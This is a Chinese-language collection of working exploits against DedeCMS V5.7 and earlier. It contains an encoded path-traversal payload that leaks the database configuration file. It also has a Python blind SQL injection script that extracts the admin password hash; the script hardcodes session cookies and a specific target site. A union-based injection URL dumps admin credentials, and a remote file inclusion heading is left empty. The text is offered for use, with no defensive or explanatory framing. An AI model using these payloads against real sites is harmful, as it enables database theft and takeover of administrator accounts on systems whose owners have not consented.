dedecms的漏洞
爆数据库 Dedecms V5.7 SP1:
直接payload一条龙服务哈
/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0
SQL注入 Dedecms V5.7 SP1:
利用前提:member下注册功能开放
利用脚本:
#!/usr/bin/env python
# encoding:utf-8
# Date: 2015/12/25
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import re
import random
import urllib2
def Get_respone(mtype_url, mdata='', method='get'):
'发送数据包函数'
headers = {
'Cookie': 'PIDDAV253154=2019041022304518294570; FVTDAV253154=636905322478704625; PHPSESSID=thsqq6s84lc9h2sicf0sv6ir91; DedeUserID=9981; DedeUserID__ckMd5=28f81f2935375e34; DedeLoginTime=1555069244; DedeLoginTime__ckMd5=05d1ba08e4f839e5; OrdersId=e6a1UlIFCQQBAVFUAFVbAlEEBFdbWgIEUg4AAwNhGmUFUwdXUgMABwkHMyoGWlo; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1; LVTDAV253154=636906957184017134; VTSDAV253154=4; MSTSDAV253154=0; VPSDAV253154=31; SIDDAV253154=f908f9d9a2844172a8e829fa19997301; LROIDDAV253154=1000'
}
try:
request = urllib2.Request(mtype_url, headers=headers)
if method == 'post':
response = urllib2.urlopen(request, data=mdata, timeout=10).read()
else:
response = urllib2.urlopen(request, timeout=10).read()
except Exception, msg:
print u'[X] 我擦,出错了!', msg
raise SystemExit()
else:
return response
def Create_id():
'创建分类函数'
print u'\n[!] 分类ID不存在,正在创建!'
response = Get_respone(mtype_url + '?dopost=add', 'mtypename=hacker&channelid=1', method='post')
if '增加分类成功' in response:
print u'\n[!] 分类创建成功,请重新执行程序!'
else:
print u'\n[X] 分类创建失败,请手工创建!'
def Get_id():
'获取分类ID函数'
response = Get_respone(mtype_url)
if '系统关闭了会员功能' in response:
print u'会员中心关闭,漏洞不存在!'
raise SystemExit()
else:
type_reg = re.compile('mtypename\[(\d+)\]')
idlist = type_reg.findall(response)
if idlist: return idlist[0]
def Get_hash(typeid):
'盲注获取admin密码'
adminhash = ''
md5_chars = list('abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPLKJHGFDSAZXCVBNM')
try:
for i in range(1, 17):
flag = random.random()
for j in md5_chars:
payload_pre = "?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name]["
payload_cent = urllib2.quote(
"a' and `'`.``.mtypeid or if(ascii (substr((select left(substring(pwd,4),16) from dede_admin limit 1),"
+ str(i) + ",1))=" + str(ord(j)) + ",1,0) and mtypeid=" + str(typeid) + "#"
)
payload_end = "]=" + str(flag) + "&_FILES[mtypename][size]=.xxxx]"
payload = payload_pre + payload_cent + payload_end
payload_res = Get_respone(mtype_url + payload)
# print response
match_res = Get_respone(mtype_url)
if str(flag) in match_res:
print u'[!] 爷,正在爆破第 [%-2d] 位,字符为: %s' % (i, j)
adminhash = adminhash + j
break
except KeyboardInterrupt:
print u'[!] 爷,按您的吩咐,已成功退出!'
else:
if adminhash == '':
print u'[X] 爷,杯具了,漏洞不存在!'
else:
print u'\n[¤] 爷,爆破完毕!密码为:', adminhash
if __name__ == '__main__':
mtype_url = 'http://www.13sr.com/member/mtypes.php'
typeid = Get_id()
if typeid is None:
Create_id()
else:
Get_hash(typeid)
远程文件包含漏洞 Dedecms V5.7 SP1:
通杀SQL注入漏洞 DedeCMS V5.7 20140201之前:
payload:http://baidu.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111